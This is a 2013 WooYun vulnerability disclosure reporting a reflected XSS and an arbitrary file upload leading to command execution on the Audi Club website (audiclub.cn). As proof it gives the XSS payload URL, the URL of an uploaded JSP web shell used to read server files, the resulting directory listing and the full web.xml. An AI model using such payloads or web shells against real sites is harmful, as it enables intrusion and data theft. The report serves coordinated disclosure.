当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-025533

漏洞标题:奥迪俱乐部代码执行

相关厂商:一汽-大众汽车有限公司

漏洞作者: zhk

提交时间:2013-06-09 12:48

修复时间:2013-07-24 12:48

公开时间:2013-07-24 12:48

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-06-09: 细节已通知厂商并且等待厂商处理中
2013-06-14: 厂商已经确认,细节仅向厂商公开
2013-06-24: 细节向核心白帽子及相关领域专家公开
2013-07-04: 细节向普通白帽子公开
2013-07-14: 细节向实习白帽子公开
2013-07-24: 细节向公众公开

简要描述:

奥迪俱乐部代码执行,顺便附上个XSS

详细说明:

反射型XSS:http://www.audiclub.cn/uploadHeadImg/uploadimage.jsp?Picurl=pic2000844.jpg%22%3EXSS%20here&step=2
代码执行:http://www.audiclub.cn/circle!create.action 存在任意文件上传,导致命令执行

当前/www/newaudi_cms/audiclub/
目录有: 
/www/newaudi_cms/audiclub/weibo
/www/newaudi_cms/audiclub/circle
/www/newaudi_cms/audiclub/upload
/www/newaudi_cms/audiclub/admin
/www/newaudi_cms/audiclub/album
/www/newaudi_cms/audiclub/activity
/www/newaudi_cms/audiclub/integral
/www/newaudi_cms/audiclub/landofquattro
/www/newaudi_cms/audiclub/q3
/www/newaudi_cms/audiclub/vedio
/www/newaudi_cms/audiclub/My97DatePicker
/www/newaudi_cms/audiclub/image
/www/newaudi_cms/audiclub/js
/www/newaudi_cms/audiclub/common
/www/newaudi_cms/audiclub/2013shms
/www/newaudi_cms/audiclub/user
/www/newaudi_cms/audiclub/uploadfiles
/www/newaudi_cms/audiclub/xheditor-1.1.14
/www/newaudi_cms/audiclub/m
/www/newaudi_cms/audiclub/WEB-INF
/www/newaudi_cms/audiclub/uploadHeadImg
/www/newaudi_cms/audiclub/excellence
文件有: 
/www/newaudi_cms/audiclub/index.jsp
/www/newaudi_cms/audiclub/wb_e4b0b2761bda439d.txt
/www/newaudi_cms/audiclub/__utm.gif
/www/newaudi_cms/audiclub/index.html
/www/newaudi_cms/audiclub/500.html
/www/newaudi_cms/audiclub/404.html
/www/newaudi_cms/audiclub/crossdomain.xml
/www/newaudi_cms/audiclub/login.jsp
/www/newaudi_cms/audiclub/urchin.js

漏洞证明:

view-source:http://www.audiclub.cn/image/1370751804647.jsp?p=/WEB-INF/web.xml

FILE:/WEB-INF/web.xml
 
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
		xmlns="http://java.sun.com/xml/ns/javaee" 
		xmlns:web="http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" 
		xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" 
		id="WebApp_ID" version="2.5">
	<display-name>OEMP CMS</display-name>
	<context-param>
		<param-name>contextConfigLocation</param-name>
		<param-value>/WEB-INF/classes/applicationContext.xml</param-value>
	</context-param>
	<filter>
		<filter-name>struts-cleanup</filter-name>
		<filter-class>org.apache.struts2.dispatcher.ActionContextCleanUp</filter-class>
	</filter>
	
    <filter>
		<filter-name>osivFilter</filter-name>
		<filter-class>org.springframework.orm.hibernate3.support.OpenSessionInViewFilter</filter-class>
	</filter> 
    <filter>
        <filter-name>struts2</filter-name>
        <filter-class>org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter</filter-class>
    </filter>
    
  	<filter-mapping>
        <filter-name>struts-cleanup</filter-name>
        <url-pattern>/*</url-pattern>
    </filter-mapping>
    
   
    <filter-mapping>
		<filter-name>osivFilter</filter-name>
		<url-pattern>*.action</url-pattern>
	</filter-mapping>
	
	<filter-mapping>
        <filter-name>struts2</filter-name>
        <url-pattern>*.jsp</url-pattern>
    </filter-mapping>
    
	<filter-mapping>
		<filter-name>osivFilter</filter-name>
		<url-pattern>*.htm</url-pattern>
	</filter-mapping> 
	
	<filter-mapping>
        <filter-name>struts2</filter-name>
        <url-pattern>*.action</url-pattern>
    </filter-mapping>
    <filter-mapping>
        <filter-name>struts2</filter-name>
        <url-pattern>*.jsp</url-pattern>
    </filter-mapping>
    <filter-mapping>
        <filter-name>struts2</filter-name>
        <url-pattern>*.htm</url-pattern>
    </filter-mapping>
        
	<listener>
		<listener-class>org.springframework.web.context.ContextLoaderListener</listener-class>
	</listener>
	<!-- Spring 刷新Introspector防止内存泄露 -->
	<listener>
		<listener-class>org.springframework.web.util.IntrospectorCleanupListener</listener-class>
	</listener>
	<!-- 需要注释掉listenser -->
	
	<!-- session超时定义,单位为分钟 -->
	<session-config>
		<session-timeout>120</session-timeout>
	</session-config>
	
	<error-page>
        <error-code>500</error-code>
        <location>/500.html</location>
    </error-page>
    <error-page>
        <error-code>404</error-code>
        <location>/404.html</location>
    </error-page>
	<welcome-file-list>
		<welcome-file>index.htm</welcome-file>
        <welcome-file>index.html/welcome-file>
        <welcome-file>index.jsp</welcome-file>
    </welcome-file-list>
    
    <mime-mapping> 
		<extension>rar</extension>
		<mime-type>application/zip</mime-type>
	</mime-mapping>
	<mime-mapping>
		<extension>doc</extension>
		<mime-type>application/zip</mime-type>
	</mime-mapping>
	
	 <!-- 上传头像servlet 开始-->
  <servlet>
    <servlet-name>UpLoadUserHeadImage</servlet-name>
    <servlet-class>com.oemp.audi.uploadHeadImg.servlet.UpLoadUserHeadImage</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>UpLoadUserHeadImage</servlet-name>
    <url-pattern>/servlet/UpLoadUserHeadImage</url-pattern>
  </servlet-mapping>
  
  <servlet>
    <servlet-name>ZoomImage</servlet-name>
    <servlet-class>com.oemp.audi.uploadHeadImg.servlet.ZoomImage</servlet-class>
  </servlet>  
  <servlet-mapping>
    <servlet-name>ZoomImage</servlet-name>
    <url-pattern>/servlet/ZoomImage</url-pattern>
  </servlet-mapping>
  <!-- 上传头像servlet 结束-->
</web-app>


2013-06-09 12:04:25的屏幕截图.png


修复方案:

对文件进行过滤

版权声明:转载请注明来源 zhk@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-06-14 01:25

厂商回复:

最新状态:

暂无